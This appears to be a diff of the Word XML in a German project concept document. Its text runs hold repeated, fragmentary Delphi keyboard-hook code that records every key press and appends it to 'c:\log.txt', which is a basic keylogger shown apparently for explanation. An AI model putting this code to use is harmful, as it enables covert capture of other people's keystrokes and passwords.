+        <w:t>        VK_DELETE: buf := 'Delete';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_TAB: buf := 'Tab';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_RETURN: buf := 'Enter';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_SHIFT: buf := 'Shift';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_CAPITAL: buf := 'CapsLock';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_ESCAPE: buf := 'Esc';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_SPACE: buf := 'Space';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t>        // etc. keys you're interested in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        buf := AChar[0];</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      LogText := LogText + buf;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // open the log file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      FileName := 'c:\log.txt'; // your log filename here</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      AssignFile(FF, FileName);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      if FileExists(FileName) then Append(FF)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else Rewrite(FF);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // write to the log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      WriteLn(FF, LogText);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // close the log file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      CloseFile(FF);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  {Call the next hook in the hook chain}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (Code &lt; 0) then</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    result := CallNextHookEx(TheHookHandle, Code, wParam, lParam);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>procedure StartTheHook; stdcall;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
         <w:t>begin</w:t>
       </w:r>
       <w:r>
@@ -576,390 +1080,6 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
-        <w:t>  result := 0;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">  if (Code = </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:t>HC_ACTION</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:t>) then begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    if (tagMSG(Ptr(lParam)^).Message = WM_KEYUP) or (tagMSG(Ptr(lParam)^).Message = WM_KEYDOWN) then begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:t>// pointer?</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // record UP/DOWN state</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      if (tagMSG(Ptr(lParam)^).Message = WM_KEYUP) then LogText := 'KEYUP   '</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      else LogText := 'KEYDOWN ';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // translate the key to ASCII</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      GetKeyboardState(KeyState);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:t>VirtualKey := tagMSG(Ptr(lParam)^).WParam;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      ScanCode := HIBYTE(LOWORD(tagMSG(Ptr(lParam)^).lParam));</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t xml:space="preserve">      </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // exceptions</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      case VirtualKey of</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_BACK: buf := 'Backspace';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_DELETE: buf := 'Delete';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_TAB: buf := 'Tab';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_RETURN: buf := 'Enter';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_SHIFT: buf := 'Shift';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_CAPITAL: buf := 'CapsLock';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_ESCAPE: buf := 'Esc';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_SPACE: buf := 'Space';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        // etc. keys you're interested in</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      else</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        buf := AChar[0];</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      LogText := LogText + buf;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // open the log file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      FileName := 'c:\log.txt'; // your log filename here</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      AssignFile(FF, FileName);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      if FileExists(FileName) then Append(FF)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      else Rewrite(FF);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // write to the log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      WriteLn(FF, LogText);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      // close the log file</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      CloseFile(FF);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  {Call the next hook in the hook chain}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>  if (Code &lt; 0) then</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>    result := CallNextHookEx(TheHookHandle, Code, wParam, lParam);</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>procedure StartTheHook; stdcall;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>begin</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
         <w:t>  if (TheHookHandle = 0) then begin</w:t>
       </w:r>
       <w:r>
@@ -972,7 +1092,6 @@
         <w:rPr>
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:br/>
         <w:t>    // set the hook</w:t>
       </w:r>
@@ -1542,7 +1661,7 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0807001B" w:tentative="1">
+    <w:lvl w:ilvl="2" w:tplc="0807001B">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%3."/>

--- a/Konzept.docx
+++ b/Konzept.docx
@@ -144,6 +144,8 @@
         </w:rPr>
         <w:t>Git</w:t>
       </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -216,8 +218,24 @@
         </w:rPr>
         <w:t>Erklärung anhand Code</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listenabsatz"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="sq-AL"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL"/>
+        </w:rPr>
+        <w:t>Reflexion</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -545,6 +563,12 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>begin</w:t>
       </w:r>
       <w:r>
@@ -703,177 +727,323 @@
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:br/>
+        <w:t>        VK_DELETE: buf := 'Delete';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_TAB: buf := 'Tab';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_RETURN: buf := 'Enter';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_SHIFT: buf := 'Shift';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_CAPITAL: buf := 'CapsLock';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_ESCAPE: buf := 'Esc';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        VK_SPACE: buf := 'Space';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        // etc. keys you're interested in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>        buf := AChar[0];</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      LogText := LogText + buf;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // open the log file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      FileName := 'c:\log.txt'; // your log filename here</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      AssignFile(FF, FileName);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      if FileExists(FileName) then Append(FF)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      else Rewrite(FF);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // write to the log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      WriteLn(FF, LogText);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      // close the log file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>      CloseFile(FF);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  {Call the next hook in the hook chain}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (Code &lt; 0) then</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>    result := CallNextHookEx(TheHookHandle, Code, wParam, lParam);</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>end;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>procedure StartTheHook; stdcall;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>  if (TheHookHandle = 0) then begin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>        VK_DELETE: buf := 'Delete';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_TAB: buf := 'Tab';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_RETURN: buf := 'Enter';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_SHIFT: buf := 'Shift';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_CAPITAL: buf := 'CapsLock';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_ESCAPE: buf := 'Esc';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        VK_SPACE: buf := 'Space';</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        // etc. keys you're interested in</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      else</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>        buf := AChar[0];</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="sq-AL" w:eastAsia="de-CH"/>
-        </w:rPr>
-        <w:br/>
-        <w:t>      end;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
